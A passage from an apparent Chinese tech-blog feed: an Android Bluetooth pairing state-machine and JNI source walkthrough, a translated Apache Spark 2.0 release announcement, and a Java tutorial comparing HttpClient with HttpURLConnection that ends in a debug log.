                   msg.what != PIN_REQUEST) {
                 deferMessage(msg);
                 return true;
             }

            Intent intent = new Intent(BluetoothDevice.ACTION_PAIRING_REQUEST);

            switch (msg.what) {
                case CREATE_BOND:
                    result = createBond(dev, msg.arg1, false);
                    break;
                case REMOVE_BOND:
                    result = removeBond(dev, false);
                    break;
                case CANCEL_BOND:
                    result = cancelBond(dev);
                    break;
                case BONDING_STATE_CHANGE:
                    int newState = msg.arg1;
                    int reason = getUnbondReasonFromHALCode(msg.arg2);
                    sendIntent(dev, newState, reason);
                    if(newState != BluetoothDevice.BOND_BONDING )
                    {
                        /* this is either none/bonded, remove and transition */
                        result = !mDevices.remove(dev);
                        if (mDevices.isEmpty()) {
                            // Whenever mDevices is empty, then we need to
                            // set result=false. Else, we will end up adding
                            // the device to the list again. This prevents us
                            // from pairing with a device that we just unpaired
                            result = false;
                            transitionTo(mStableState);
                        }
                        if (newState == BluetoothDevice.BOND_NONE)
                        {
                            mAdapterService.setPhonebookAccessPermission(dev,
                                    BluetoothDevice.ACCESS_UNKNOWN);
                            mAdapterService.setMessageAccessPermission(dev,
                                    BluetoothDevice.ACCESS_UNKNOWN);
                            mAdapterService.setSimAccessPermission(dev,
                                    BluetoothDevice.ACCESS_UNKNOWN);
                            // Set the profile Priorities to undefined
                            clearProfilePriorty(dev);
                        }
                        else if (newState == BluetoothDevice.BOND_BONDED)
                        {
                           // Do not set profile priority
                           // Profile priority should be set after SDP completion

                           // Restore the profile priorty settings
                           //setProfilePriorty(dev);
                        }
                    }
                    else if(!mDevices.contains(dev))
                        result=true;
                    break;
                case SSP_REQUEST:
                    int passkey = msg.arg1;
                    int variant = msg.arg2;
                    sendDisplayPinIntent(devProp.getAddress(), passkey, variant);
                    break;
                case PIN_REQUEST:
                    BluetoothClass btClass = dev.getBluetoothClass();
                    int btDeviceClass = btClass.getDeviceClass();
                    if (btDeviceClass == BluetoothClass.Device.PERIPHERAL_KEYBOARD ||
                         btDeviceClass == BluetoothClass.Device.PERIPHERAL_KEYBOARD_POINTING) {
                        // Its a keyboard. Follow the HID spec recommendation of creating the
                        // passkey and displaying it to the user. If the keyboard doesn't follow
                        // the spec recommendation, check if the keyboard has a fixed PIN zero
                        // and pair.
                        //TODO: Maintain list of devices that have fixed pin
                        // Generate a variable 6-digit PIN in range of 100000-999999
                        // This is not truly random but good enough.
                        int pin = 100000 + (int)Math.floor((Math.random() * (999999 - 100000)));
                        sendDisplayPinIntent(devProp.getAddress(), pin,
                                 BluetoothDevice.PAIRING_VARIANT_DISPLAY_PIN);
                        break;
                    }

                    if (msg.arg2 == 1) { // Minimum 16 digit pin required here
                        sendDisplayPinIntent(devProp.getAddress(), 0,
                                BluetoothDevice.PAIRING_VARIANT_PIN_16_DIGITS);
                    } else {
                        // In PIN_REQUEST, there is no passkey to display.So do not send the
                        // EXTRA_PAIRING_KEY type in the intent( 0 in SendDisplayPinIntent() )
                        sendDisplayPinIntent(devProp.getAddress(), 0,
                                              BluetoothDevice.PAIRING_VARIANT_PIN);
                    }

                    break;
                default:
                    Log.e(TAG, "Received unhandled event:" + msg.what);
                    return false;
            }
            if (result) mDevices.add(dev);

            return true;
        }
    }

实现了两个state，一个是StableState一个是PendingCommandState。它们又各自实现了enter和processMessage方法。BondStateMachine的构造函数添加了两个state。

        addState(mStableState);
        addState(mPendingCommandState);

并使用setInitialState为mStateState。

setInitialState(mStableState);

构造完成后调用start方法启动状态机。

        bsm.start();

调用start启动状态机后，所有状态的enter方法会被调用。

接下来就是消息的创建，发送

    void bondStateChangeCallback(int status, byte[] address, int newState) {
        BluetoothDevice device = mRemoteDevices.getDevice(address);

        if (device == null) {
            infoLog("No record of the device:" + device);
            // This device will be added as part of the BONDING_STATE_CHANGE intent processing
            // in sendIntent above
            device = mAdapter.getRemoteDevice(Utils.getAddressStringFromByte(address));
        }

        infoLog("bondStateChangeCallback: Status: " + status + " Address: " + device
                + " newState: " + newState);

        Message msg =<strong> obtainMessage</strong>(BONDING_STATE_CHANGE);
        msg.obj = device;

        if (newState == BOND_STATE_BONDED)
            msg.arg1 = BluetoothDevice.BOND_BONDED;
        else if (newState == BOND_STATE_BONDING)
            msg.arg1 = BluetoothDevice.BOND_BONDING;
        else
            msg.arg1 = BluetoothDevice.BOND_NONE;
        msg.arg2 = status;

        <strong>sendMessage</strong>(msg);
    }
    void sspRequestCallback(byte[] address, byte[] name, int cod, int pairingVariant,
            int passkey) {
        //TODO(BT): Get wakelock and update name and cod
        BluetoothDevice bdDevice = mRemoteDevices.getDevice(address);
        if (bdDevice == null) {
            mRemoteDevices.addDeviceProperties(address);
        }
        infoLog("sspRequestCallback: " + address + " name: " + name + " cod: " +
                cod + " pairingVariant " + pairingVariant + " passkey: " + passkey);
        int variant;
        boolean displayPasskey = false;
        switch(pairingVariant) {

            case AbstractionLayer.BT_SSP_VARIANT_PASSKEY_CONFIRMATION :
                variant = BluetoothDevice.PAIRING_VARIANT_PASSKEY_CONFIRMATION;
                displayPasskey = true;
            break;

            case AbstractionLayer.BT_SSP_VARIANT_CONSENT :
                variant = BluetoothDevice.PAIRING_VARIANT_CONSENT;
            break;

            case AbstractionLayer.BT_SSP_VARIANT_PASSKEY_ENTRY :
                variant = BluetoothDevice.PAIRING_VARIANT_PASSKEY;
            break;

            case AbstractionLayer.BT_SSP_VARIANT_PASSKEY_NOTIFICATION :
                variant = BluetoothDevice.PAIRING_VARIANT_DISPLAY_PASSKEY;
                displayPasskey = true;
            break;

            default:
                errorLog("SSP Pairing variant not present");
                return;
        }
        BluetoothDevice device = mRemoteDevices.getDevice(address);
        if (device == null) {
           warnLog("Device is not known for:" + Utils.getAddressStringFromByte(address));
           mRemoteDevices.addDeviceProperties(address);
           device = mRemoteDevices.getDevice(address);
        }

        Message msg = <strong>obtainMessage</strong>(SSP_REQUEST);
        msg.obj = device;
        if(displayPasskey)
            msg.arg1 = passkey;
        msg.arg2 = variant;
        <strong>sendMessage</strong>(msg);
    }

    void pinRequestCallback(byte[] address, byte[] name, int cod, boolean min16Digits) {
        //TODO(BT): Get wakelock and update name and cod

        BluetoothDevice bdDevice = mRemoteDevices.getDevice(address);
        if (bdDevice == null) {
            mRemoteDevices.addDeviceProperties(address);
        }
        infoLog("pinRequestCallback: " + address + " name:" + name + " cod:" +
                cod);

        Message msg = <strong>obtainMessage</strong>(PIN_REQUEST);
        msg.obj = bdDevice;
        msg.arg2 = min16Digits ? 1 : 0; // Use arg2 to pass the min16Digit boolean

        <strong>sendMessage</strong>(msg);
    }

上面的三个方法会被native层调用，native层根据需要调用这些函数以通知最上层的java。

<./packages/apps/Bluetooth/src/com/android/bluetooth/btservice/JniCallbacks.java>
final class JniCallbacks {
..
    void pinRequestCallback(byte[] address, byte[] name, int cod, boolean min16Digits) {
        mBondStateMachine.pinRequestCallback(address, name, cod, min16Digits);
    }

    void bondStateChangeCallback(int status, byte[] address, int newState) {
        mBondStateMachine.bondStateChangeCallback(status, address, newState);
    }
...
}

如

 《packages/apps/Bluetooth/jni/com_android_bluetooth_btservice_AdapterService.cpp》
 287 static void bond_state_changed_callback(bt_status_t status, bt_bdaddr_t *bd_addr,
 288                                         bt_bond_state_t state) {
 289     jbyteArray addr;
 290     int i;
 291     if (!checkCallbackThread()) {
 292        ALOGE("Callback: '%s' is not called on the correct thread", __FUNCTION__);
 293        return;
 294     }
 295     if (!bd_addr) {
 296         ALOGE("Address is null in %s", __FUNCTION__);
 297         return;
 298     }
 299     addr = callbackEnv->NewByteArray(sizeof(bt_bdaddr_t));
 300     if (addr == NULL) {
 301        ALOGE("Address allocation failed in %s", __FUNCTION__);
 302        return;
 303     }
 304     callbackEnv->SetByteArrayRegion(addr, 0, sizeof(bt_bdaddr_t), (jbyte *)bd_addr);
 305 
//   3 调用这个方法
 306     callbackEnv->CallVoidMethod(sJniCallbacksObj, method_bondStateChangeCallback, (jint) status,
 307                                 addr, (jint)state);
 308     checkAndClearExceptionFromCallback(callbackEnv, __FUNCTION__);
 309     callbackEnv->DeleteLocalRef(addr);
 310 }

 602 static void classInitNative(JNIEnv* env, jclass clazz) {
 603     int err;
 604     hw_module_t* module;
 605 
<pre name="code" class="cpp">//   1   java反射法，找到java里的class文件

606     jclass jniCallbackClass =
607         env->FindClass("com/android/bluetooth/btservice/JniCallbacks");
608     sJniCallbacksField = env->GetFieldID(clazz, "mJniCallbacks",
609         "Lcom/android/bluetooth/btservice/JniCallbacks;");
610

//   2 找java class里的方法

611     method_stateChangeCallback = env->GetMethodID(jniCallbackClass, "stateChangeCallback", "(I)V");
612
613     method_adapterPropertyChangedCallback = env->GetMethodID(jniCallbackClass,
614                                                              "adapterPropertyChangedCallback",
615                                                              "([I[[B)V");
616     method_discoveryStateChangeCallback = env->GetMethodID(jniCallbackClass,
617                                                            "discoveryStateChangeCallback", "(I)V");
618
619     method_devicePropertyChangedCallback = env->GetMethodID(jniCallbackClass,
620                                                             "devicePropertyChangedCallback",
621                                                             "([B[I[[B)V");
622     method_deviceFoundCallback = env->GetMethodID(jniCallbackClass, "deviceFoundCallback", "([B)V");
623     method_pinRequestCallback = env->GetMethodID(jniCallbackClass, "pinRequestCallback",
624                                                  "([B[BIZ)V");
625     method_sspRequestCallback = env->GetMethodID(jniCallbackClass, "sspRequestCallback",
626                                                  "([B[BIII)V");
627
628     method_bondStateChangeCallback = env->GetMethodID(jniCallbackClass,
629                                                      "bondStateChangeCallback", "(I[BI)V");
630
631     method_aclStateChangeCallback = env->GetMethodID(jniCallbackClass,
632                                                     "aclStateChangeCallback", "(I[BI)V");

1133 static JNINativeMethod sMethods[] = {
1134     /* name, signature, funcPtr */
1135     {"classInitNative", "()V", (void *) classInitNative},
1136     {"initNative", "()Z", (void *) initNative},
1137     {"cleanupNative", "()V", (void*) cleanupNative},
1138     {"enableNative", "()Z", (void*) enableNative},
1139     {"disableNative", "()Z", (void*) disableNative},
1140     {"setAdapterPropertyNative", "(I[B)Z", (void*) setAdapterPropertyNative},
1141     {"getAdapterPropertiesNative", "()Z", (void*) getAdapterPropertiesNative},
1142     {"getAdapterPropertyNative", "(I)Z", (void*) getAdapterPropertyNative},
1143     {"getDevicePropertyNative", "([BI)Z", (void*) getDevicePropertyNative},
1144     {"setDevicePropertyNative", "([BI[B)Z", (void*) setDevicePropertyNative},
1145     {"startDiscoveryNative", "()Z", (void*) startDiscoveryNative},
1146     {"cancelDiscoveryNative", "()Z", (void*) cancelDiscoveryNative},
1147     {"createBondNative", "([BI)Z", (void*) createBondNative},
1148     {"removeBondNative", "([B)Z", (void*) removeBondNative},
1149     {"cancelBondNative", "([B)Z", (void*) cancelBondNative},
1150     {"getConnectionStateNative", "([B)I", (void*) getConnectionStateNative},
1151     {"pinReplyNative", "([BZI[B)Z", (void*) pinReplyNative},
1152     {"sspReplyNative", "([BIZI)Z", (void*) sspReplyNative},
1153     {"getRemoteServicesNative", "([B)Z", (void*) getRemoteServicesNative},
1154     {"connectSocketNative", "([BI[BII)I", (void*) connectSocketNative},
1155     {"createSocketChannelNative", "(ILjava/lang/String;[BII)I",
1156      (void*) createSocketChannelNative},
1157     {"configHciSnoopLogNative", "(Z)Z", (void*) configHciSnoopLogNative},
1158     {"alarmFiredNative", "()V", (void *) alarmFiredNative},
1159     {"readEnergyInfo", "()I", (void*) readEnergyInfo},
1160     {"dumpNative", "(Ljava/io/FileDescriptor;)V", (void*) dumpNative},
1161     {"factoryResetNative", "()Z", (void*)factoryResetNative}
1162 };

1164 int register_com_android_bluetooth_btservice_AdapterService(JNIEnv* env)
1165 {
1166     return jniRegisterNativeMethods(env, "com/android/bluetooth/btservice/AdapterService",
1167                                     sMethods, NELEM(sMethods));
1168 }

1176 jint JNI_OnLoad(JavaVM *jvm, void *reserved)
1177 {
1178     JNIEnv *e;
1179     int status;
1180
1181     ALOGV("Bluetooth Adapter Service : loading JNI\n");
1182
1183     // Check JNI version
1184     if (jvm->GetEnv((void **)&e, JNI_VERSION_1_6)) {
1185         ALOGE("JNI version mismatch error");
1186         return JNI_ERR;
1187     }
1188
1189     if ((status = android::register_com_android_bluetooth_btservice_AdapterService(e)) < 0) {
1190         ALOGE("jni adapter service registration failure, status: %d", status);
1191         return JNI_ERR;
1192     }

...

JNI加载

./Bluetooth/src/com/android/bluetooth/btservice/AdapterApp.java:34:        System.loadLibrary("bluetooth_jni");

由上述可以看出在AdapterApp里JNI组件被加载

java层也可以发送消息

 //packages/apps/Bluetooth/src/com/android/bluetooth/btservice/AdapterService.java    
     boolean createBond(BluetoothDevice device, int transport) {
        enforceCallingOrSelfPermission(BLUETOOTH_ADMIN_PERM,
            "Need BLUETOOTH ADMIN permission");
        DeviceProperties deviceProp = mRemoteDevices.getDeviceProperties(device);
        if (deviceProp != null && deviceProp.getBondState() != BluetoothDevice.BOND_NONE) {
            return false;
        }

        // Pairing is unreliable while scanning, so cancel discovery
        // Note, remove this when native stack improves
        cancelDiscoveryNative();

        Message msg =<strong> mBondStateMachine.obtainMessage</strong>(BondStateMachine.CREATE_BOND);
        msg.obj = device;
        msg.arg1 = transport;
        <strong>mBondStateMachine.sendMessage</strong>(msg);
        return true;
    }


    boolean removeBond(BluetoothDevice device) {
        enforceCallingOrSelfPermission(BLUETOOTH_ADMIN_PERM, "Need BLUETOOTH ADMIN permission");
        DeviceProperties deviceProp = mRemoteDevices.getDeviceProperties(device);
        if (deviceProp == null || deviceProp.getBondState() != BluetoothDevice.BOND_BONDED) {
            return false;
        }
        Message msg = <strong>mBondStateMachine.obtainMessage</strong>(BondStateMachine.REMOVE_BOND);
        msg.obj = device;
        <strong>mBondStateMachine.sendMessage</strong>(msg);
        return true;
    }

作者：shichaog 发表于2016/7/31 0:24:19 原文链接

阅读：17 评论：0 查看评论

↧

Apache Spark 2.0正式版发布

July 31, 2016, 12:35 am

≫ Next: HTTPClient和HttpURLConnection实例对比

≪ Previous: 蓝牙之三-StateMachine

以下为Databricks官网的发布新闻稿翻译：

我们很荣幸地宣布，自7月26日起Databricks开始提供Apache Spark 2.0的下载，这个版本是基于社区在过去两年的经验总结而成，不但加入了用户喜爱的功能，也修复了之前的痛点。

本文总结了Spark 2.0的三大主题：更简单、更快速、更智能，另有Spark 2.0内容的文章汇总介绍了更多细节。

两个月前，Databricks发布了Apache Spark 2.0的技术预览版，如下表所见，目前我们有10%的集群都在使用这个版本，根据客户使用新版的经验及反馈意见，新版得以发布，Databricks很开心能成为Spark 2.0的首个商业供应商。

图片描述

随着时间推移，各版本Apache Spark的使用率

现在，我们来深入了解一下Apache Spark 2.0的新特性。

更简单：ANSI SQL与更合理的API

Spark让我们引以为豪的一点就是所创建的API简单、直观、便于使用，Spark 2.0延续了这一传统，并在两个方面凸显了优势：

标准的SQL支持；
数据框（DataFrame）/Dataset （数据集）API的统一。

在SQL方面，我们已经对Spark的SQL功能做了重大拓展，引入了新的ANSI SQL解析器，并支持子查询功能。Spark 2.0可以运行所有99个TPC-DS查询（需求SQL：2003中的很多功能支持）。由于SQL是Spark应用所使用的主要接口之一，对SQL功能的拓展大幅削减了将遗留应用移植到Spark时所需的工作。

在编程API方面，我们合理化了API：

在Scala/Java中统一了DataFrames与Dataset：从Spark 2.0开始，DataFrames只是行（row）数据集的typealias了。无论是映射、筛选、groupByKey之类的类型方法，还是select、groupBy之类的无类型方法都可用于Dataset的类。此外，这个新加入的Dataset接口是用作Structured Streaming的抽象，由于Python和R语言中编译时类型安全（compile-time type-safety）不属于语言特性，数据集的概念无法应用于这些语言API中。而DataFrame仍是主要的编程抽象，在这些语言中类似于单节点DataFrames的概念，想要了解这些API的相关信息，请参见相关笔记和文章。
SparkSession：这是一个新入口，取代了原本的SQLContext与HiveContext。对于DataFrame API的用户来说，Spark常见的混乱源头来自于使用哪个“context”。现在你可以使用SparkSession了，它作为单个入口可以兼容两者，点击这里来查看演示。注意原本的SQLContext与HiveContext仍然保留，以支持向下兼容。
更简单、性能更佳的Accumulator API：我们设计了一个新的Accumulator API，不但在类型层次上更简洁，同时还专门支持基本类型。原本的Accumulator API已不再使用，但为了向下兼容仍然保留。
基于DataFrame的机器学习API将作为主ML API出现：在Spark 2.0中，spark.ml包及其“管道”API会作为机器学习的主要API出现，尽管原本的spark.mllib包仍然保留，但以后的开发重点会集中在基于DataFrame的API上。
机器学习管道持久化：现在用户可以保留与载入机器学习的管道与模型了，Spark对所有语言提供支持。查看这篇博文以了解更多细节，这篇笔记中也有相关样例。
R语言的分布式算法：增加对广义线性模型（GLM）、朴素贝叶斯算法（NB算法）、存活回归分析（Survival Regression）与聚类算法（K-Means）的支持。

速度更快：用Spark作为编译器

根据我们2015年对Spark的调查，91%的用户认为对Spark来说，性能是最为重要的。因此，性能优化一直是我们在开发Spark时所考虑的重点。在开始Spark 2.0的规划前，我们思考过这个问题：Spark的速度已经很快了，但能否突破极限，让Spark达到原本速度的10倍呢？

带着这个问题，我们切实考虑了在构建Spark物理执行层面时的方式。如果深入调查现代的数据引擎，比如Spark或者其他MPP数据库，我们会发现：CPU循环大多都做了无用功，比如执行虚拟函数调用，或者向CPU缓存或内存读取/写入中间数据；通过减少CPU循环中的浪费来优化性能，一直是我们在现代编译器上长时间以来的工作重点。

Spark 2.0搭载了第二代Tungsten引擎，该引擎是根据现代编译器与MPP数据库的理念来构建的，它将这些理念用于数据处理中，其主要思想就是在运行时使用优化后的字节码，将整体查询合成为单个函数，不再使用虚拟函数调用，而是利用CPU来注册中间数据。我们将这一技术称为“whole-stage code generation”。

在测试、对比Spark 1.6与Spark 2.0时，我们列出了在单核中处理单行数据所花费的时间（以十亿分之一秒为单位），下面的表格列出了Spark 2.0的优化内容。Spark 1.6包含代码生成技术（code generation）的使用，这一技术如今在一些顶尖的商业数据库中也有运用，正如我们看到的那样，使用了新whole-stage code generation技术后，速度比之前快了一个数量级。

在这篇笔记中可以查看其运用：我们在单台机器上对10亿记录执行了aggregations和joins操作。

图片描述

每行耗费（单线程）

这个新的引擎在执行端对端查询时是如何运作的？我们使用TPC-DS查询做了些初步分析，以对比Spark 1.6与Spark 2.0：

图片描述

除此之外，为了改进Catalyst optimizer优化器对诸如nullability propagation之类常见查询的效果，我们还做了许多工作；另外还改进了矢量化Parquet解码器，新解码器的吞吐量增加了三倍。点击这里查看Spark 2.0优化的更多细节。

这个新的引擎在执行端对端查询时是如何运作的？我们使用TPC-DS查询做了些初步分析，以对比Spark 1.6与Spark 2.0：

图片描述

更智能：Structured Streaming

作为首个尝试统一批处理与流处理计算的工具，Spark Streaming一直是大数据处理的领导者。首个流处理API叫做DStream，在Spark 0.7中初次引入，它为开发者提供了一些强大的特性，包括：只有一次语义，大规模容错，以及高吞吐。

然而，在处理了数百个真实世界的Spark Streaming部署之后，我们发现需要在真实世界做决策的应用经常需要不止一个流处理引擎。他们需要深度整合批处理堆栈与流处理堆栈，整合内部存储系统，并且要有处理业务逻辑变更的能力。因此，各大公司需要不止一个流处理引擎，并且需要能让他们开发端对端“持续化应用”的全栈系统。

Spark 2.0使用一个新的API：Structured Streaming模块来处理这些用例，与现有流系统相比，Structured Streaming有三个主要的改进：

与批处理作业集成的API：想要运行流数据计算，开发者可针对DataFrame/Dataset API编写批处理计算，过程非常简单，而Spark会自动在流数据模式中执行计算，也就是说在数据输入时实时更新结果。强大的设计令开发者无需费心管理状态与故障，也无需确保应用与批处理作业的同步，这些都由系统自动解决。此外，针对相同的数据，批处理任务总能给出相同的结果。
与存储系统的事务交互： Structured Streaming会在整个引擎及存储系统中处理容错与持久化的问题，使得程序员得以很容易地编写应用，令实时更新的数据库可靠地提供、加入静态数据或者移动数据。
与Spark的其它组件的深入集成： Structured Streaming支持通过Spark SQL进行流数据的互动查询，可以添加静态数据以及很多已经使用DataFrames的库，还能让开发者得以构建完整的应用，而不只是数据流管道。未来，我们希望能有更多与MLlib及其它libraries的集成出现。

Spark 2.0搭载了初始alpha版的Strutured Streaming API，这是一个附在DataFrame/Dataset API上的（超小）扩展包。统一之后，对现有的Spark用户来说使用起来非常简单，他们能够利用在Spark 批处理API方面的知识来回答实时的新问题。这里关键的功能包括：支持基于事件时间的处理，无序/延迟数据，sessionization以及非流式数据源与Sink的紧密集成。

我们还更新了Databricks workspace以支持Structured Streaming。例如，在启动streaming查询时，notebook UI会自动显示其状态。

图片描述

Streaming很明显是一个非常广泛的话题，因此想要了解Spark 2.0中Structured Streaming的更多信息，请关注本博客。

结论

Spark的用户最初使用Spark是因为它的易用性与高性能。Spark 2.0在这些方面达到了之前的两倍，并增加了对多种工作负载的支持，请尝试一下新版本吧。

作者：zhengyongqianluck 发表于2016/7/31 0:35:58 原文链接

阅读：3 评论：0 查看评论

↧

HTTPClient和HttpURLConnection实例对比

July 31, 2016, 12:37 am

≫ Next: 原生WebService开发(服务端 / 使用JDK工具自动生成客户端)

≪ Previous: Apache Spark 2.0正式版发布

HttpURLConnection是java的标准类，什么都没封装。

HTTPClient是个开源框架，封装了访问http的请求头，参数，内容体，响应等等。

简单来说，HTTPClient就是一个增强版的HttpURLConnection，HttpURLConnection可以做的事情HTTPClient全部可以做；HttpURLConnection没有提供的有些功能，HTTPClient也提供了，但它只是关注于如何发送请求、接收响应，以及管理HTTP连接。

实例：

package com.cn.common.controller;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.net.HttpURLConnection;
import java.net.URL;

import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

import org.apache.commons.httpclient.HttpClient;
import org.apache.commons.httpclient.HttpStatus;
import org.apache.commons.httpclient.methods.PostMethod;
import org.apache.commons.httpclient.params.HttpMethodParams;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.RequestMapping;
@Controller
@RequestMapping("/http")
public class HttpClientAndURLConnectionController {

	@RequestMapping("/testHttp")
	public void testHttp(HttpServletRequest req,HttpServletResponse resp) {
		try {
			long s1 = System.currentTimeMillis();
			testHttpClient();
			long s2 = System.currentTimeMillis();
			testHttpURlConnection();
			long s3 = System.currentTimeMillis();
			System.out.println((s2-s1)+" "+(s3-s2));
		} catch (IOException e) {
			e.printStackTrace();
		}
	}
	public void testHttpClient() throws IOException{
		System.out.println("testHttpClient");
		//请求方法
    	String result="";
    	String url = "http://192.168.2.111:8088/era/user/getUserById";
    	HttpClient client =new HttpClient();
    	//设置连接时间
    	client.getHttpConnectionManager().getParams().setConnectionTimeout(30000);
    	//解决乱码问题
    	client.getParams().setParameter(HttpMethodParams.HTTP_CONTENT_CHARSET,"UTF-8");
    	PostMethod method =new PostMethod(url);
    	//传参
    	method.addParameter("userId", "100");
    	int status = client.executeMethod(method);
    	if(status == HttpStatus.SC_OK){
    		result = method.getResponseBodyAsString();
    	}
    	System.out.println(result);
    	method.releaseConnection();
    }
	public void testHttpURlConnection() throws IOException{
		System.out.println("testHttpURlConnection");
        String result = "";
        URL url = new URL("http://192.168.2.111:8088/era/user/getUserById");
        HttpURLConnection conn = (HttpURLConnection) url.openConnection();
        conn.setConnectTimeout(30000);//设置连接主机超时（单位：毫秒）
        conn.setReadTimeout(30000);//设置从主机读取数据超时（单位：毫秒）
        conn.setRequestMethod("POST");//设定请求的方法为"POST"，默认是GET
        conn.setDoInput(true);//设置是否从httpUrlConnection读入，默认情况下是true
        conn.setDoOutput(true);//设置是否向httpUrlConnection输出，因为这个是post请求，参数要放在http正文内，因此需要设为true, 默认情况下是false
        conn.setUseCaches(false);//Post请求不能使用缓存
        conn.setInstanceFollowRedirects(false);
        conn.setRequestProperty("Content-Type", "text/html; charset=utf-8");
        conn.connect();
        int responsecode = conn.getResponseCode();
        if(responsecode == HttpURLConnection.HTTP_OK){ //对应HTTP响应中状态行的响应码
        	//操作请求流，这里对应HTTP响应中的响应正文 
        	InputStream urlStream = conn.getInputStream();
            BufferedReader reader = new BufferedReader(new InputStreamReader(urlStream,"utf-8"));
            String s = "";
            while ((s = reader.readLine()) != null) {
                result += s;
            }
            reader.close();
            urlStream.close();
        }
        System.out.println(result);
        if(conn != null){
        	conn.disconnect();
        }
    }
}

调用的url方法：

@RequestMapping("/getUserById")
public void getUserById(HttpServletRequest req,HttpServletResponse resp) throws IOException{
    resp.setContentType("text/html;charset=utf-8");
    resp.setCharacterEncoding("UTF-8");
    int userId;
    if(null == req.getParameter("userId")){
    	userId = 100;
    }else{
    	userId = Integer.parseInt(req.getParameter("userId"));
    }
    User user = this.userService.selectByPrimaryKey(userId);
    ObjectMapper mapper = new ObjectMapper();
    String result = mapper.writeValueAsString(user);
    resp.getWriter().print(result);
}

项目启动后，第一次执行testHttp方法后控制台信息：

testHttpClient
2016-07-31 00:24:46,513 DEBUG [org.apache.commons.httpclient.HttpClient] - Java version: 1.7.0_75
2016-07-31 00:24:46,515 DEBUG [org.apache.commons.httpclient.HttpClient] - Java vendor: Oracle Corporation
2016-07-31 00:24:46,515 DEBUG [org.apache.commons.httpclient.HttpClient] - Java class path: D:\apache-tomcat-8.0.33/bin/bootstrap.jar;D:\apache-tomcat-8.0.33/bin/tomcat-juli.jar;D:\Program Files\Java\jdk1.7.0_75/lib/tools.jar
2016-07-31 00:24:46,515 DEBUG [org.apache.commons.httpclient.HttpClient] - Operating system name: Windows 8.1
2016-07-31 00:24:46,515 DEBUG [org.apache.commons.httpclient.HttpClient] - Operating system architecture: amd64
2016-07-31 00:24:46,515 DEBUG [org.apache.commons.httpclient.HttpClient] - Operating system version: 6.3
2016-07-31 00:24:46,516 DEBUG [org.apache.commons.httpclient.HttpClient] - SUN 1.7: SUN (DSA key/parameter generation; DSA signing; SHA-1, MD5 digests; SecureRandom; X.509 certificates; JKS keystore; PKIX CertPathValidator; PKIX CertPathBuilder; LDAP, Collection CertStores, JavaPolicy Policy; JavaLoginConfig Configuration)
2016-07-31 00:24:46,517 DEBUG [org.apache.commons.httpclient.HttpClient] - SunRsaSign 1.7: Sun RSA signature provider
2016-07-31 00:24:46,517 DEBUG [org.apache.commons.httpclient.HttpClient] - SunEC 1.7: Sun Elliptic Curve provider (EC, ECDSA, ECDH)
2016-07-31 00:24:46,517 DEBUG [org.apache.commons.httpclient.HttpClient] - SunJSSE 1.7: Sun JSSE provider(PKCS12, SunX509 key/trust factories, SSLv3, TLSv1)
2016-07-31 00:24:46,517 DEBUG [org.apache.commons.httpclient.HttpClient] - SunJCE 1.7: SunJCE Provider (implements RSA, DES, Triple DES, AES, Blowfish, ARCFOUR, RC2, PBE, Diffie-Hellman, HMAC)
2016-07-31 00:24:46,517 DEBUG [org.apache.commons.httpclient.HttpClient] - SunJGSS 1.7: Sun (Kerberos v5, SPNEGO)
2016-07-31 00:24:46,517 DEBUG [org.apache.commons.httpclient.HttpClient] - SunSASL 1.7: Sun SASL provider(implements client mechanisms for: DIGEST-MD5, GSSAPI, EXTERNAL, PLAIN, CRAM-MD5, NTLM; server mechanisms for: DIGEST-MD5, GSSAPI, CRAM-MD5, NTLM)
2016-07-31 00:24:46,518 DEBUG [org.apache.commons.httpclient.HttpClient] - XMLDSig 1.0: XMLDSig (DOM XMLSignatureFactory; DOM KeyInfoFactory)
2016-07-31 00:24:46,518 DEBUG [org.apache.commons.httpclient.HttpClient] - SunPCSC 1.7: Sun PC/SC provider
2016-07-31 00:24:46,518 DEBUG [org.apache.commons.httpclient.HttpClient] - SunMSCAPI 1.7: Sun's Microsoft Crypto API provider
2016-07-31 00:24:46,535 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.useragent = Jakarta Commons-HttpClient/3.1
2016-07-31 00:24:46,549 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.protocol.version = HTTP/1.1
2016-07-31 00:24:46,556 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.connection-manager.class = class org.apache.commons.httpclient.SimpleHttpConnectionManager
2016-07-31 00:24:46,556 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.protocol.cookie-policy = default
2016-07-31 00:24:46,557 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.protocol.element-charset = US-ASCII
2016-07-31 00:24:46,557 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.protocol.content-charset = ISO-8859-1
2016-07-31 00:24:46,562 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.method.retry-handler = org.apache.commons.httpclient.DefaultHttpMethodRetryHandler@a9d5438
2016-07-31 00:24:46,563 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.dateparser.patterns = [EEE, dd MMM yyyy HH:mm:ss zzz, EEEE, dd-MMM-yy HH:mm:ss zzz, EEE MMM d HH:mm:ss yyyy, EEE, dd-MMM-yyyy HH:mm:ss z, EEE, dd-MMM-yyyy HH-mm-ss z, EEE, dd MMM yy HH:mm:ss z, EEE dd-MMM-yyyy HH:mm:ss z, EEE dd MMM yyyy HH:mm:ss z, EEE dd-MMM-yyyy HH-mm-ss z, EEE dd-MMM-yy HH:mm:ss z, EEE dd MMM yy HH:mm:ss z, EEE,dd-MMM-yy HH:mm:ss z, EEE,dd-MMM-yyyy HH:mm:ss z, EEE, dd-MM-yyyy HH:mm:ss z]
2016-07-31 00:24:46,588 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.connection.timeout = 30000
2016-07-31 00:24:46,588 DEBUG [org.apache.commons.httpclient.params.DefaultHttpParams] - Set parameter http.protocol.content-charset = UTF-8
2016-07-31 00:24:46,727 DEBUG [org.apache.commons.httpclient.HttpConnection] - Open connection to 192.168.2.111:8088
2016-07-31 00:24:46,744 DEBUG [httpclient.wire.header] - >> "POST /era/user/getUserById HTTP/1.1[\r][\n]"
